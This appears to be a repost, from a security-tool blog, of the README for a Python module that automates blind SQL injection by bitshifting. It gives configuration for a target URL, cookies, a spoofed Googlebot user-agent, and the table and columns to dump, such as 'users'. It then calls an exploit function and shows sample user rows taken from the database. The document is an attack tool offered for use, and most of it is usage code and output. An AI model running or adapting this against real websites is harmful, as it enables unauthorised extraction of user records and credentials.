Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

This is a module that performs blind SQL injection by using the bitshifting method to calculate characters instead of guessing them. It requires 7/8 requests per character, depending on the configuration.

import blind-sql-bitshifting as x

# Edit this dictionary to configure attack vectors

Example configuration:
# Vulnerable link
x.options["target"] = ""

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1
The assume_only_ascii option makes the module assume that the characters it's dumping are all ASCII. Since the ASCII charset only goes up to 127 , we can set the first bit to 0 and not worry about calculating it. That's a 12.5% reduction in requests. Testing locally, this yeilded an average speed increase of 15% . Of course this can cause issues when dumping chars that are outside of the ASCII range. By default, it's set to 0 .
Once configured:

This returns a 2-dimensional array, with each sub-array containing a single row, the first being the column headers.
Example output:
    [['id', 'username'], ['1', 'eclipse'], ['2', 'dotcppfile'], ['3', 'Acey'], ['4', 'Wardy'], ['5', 'idek']]   

Optionally, your scripts can then harness the tabulate module to output the data:
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # This specifies to use the first row as the column headers.
               tablefmt='psql')     # Using the SQL output format. Other formats can be used.
This would output:
|   id | username   |
|    1 | eclipse    |
|    2 | dotcppfile |
|    3 | Acey       |
|    4 | Wardy      |
|    5 | idek       |

Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting Reviewed by Zion3R on 11:58 Rating: 5